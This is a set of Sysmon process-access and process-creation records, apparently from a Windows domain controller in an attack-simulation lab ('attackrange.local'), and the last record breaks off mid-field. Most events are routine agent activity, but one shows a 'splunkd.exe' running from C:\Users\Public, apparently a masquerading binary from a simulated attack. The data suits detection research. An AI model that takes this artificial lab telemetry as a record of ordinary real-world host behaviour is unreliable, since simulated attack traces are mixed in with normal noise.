{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6549,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6550,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6551,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6552,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6553,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6554,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:57.955\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1275-5F25-0000-001085540900}\r\nTargetProcessId: 3276\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:57.955","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1275-5F25-0000-001085540900}","TargetProcessId":"3276","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6555,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:58.548\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:58.548","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6556,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nProcessGuid: {E2A3D6B1-1277-5F25-0000-00108E560900}\r\nProcessId: 1360\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:57:59.002","ProcessGuid":"{E2A3D6B1-1277-5F25-0000-00108E560900}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:58:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6557,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:59.002\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1277-5F25-0000-00108E560900}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 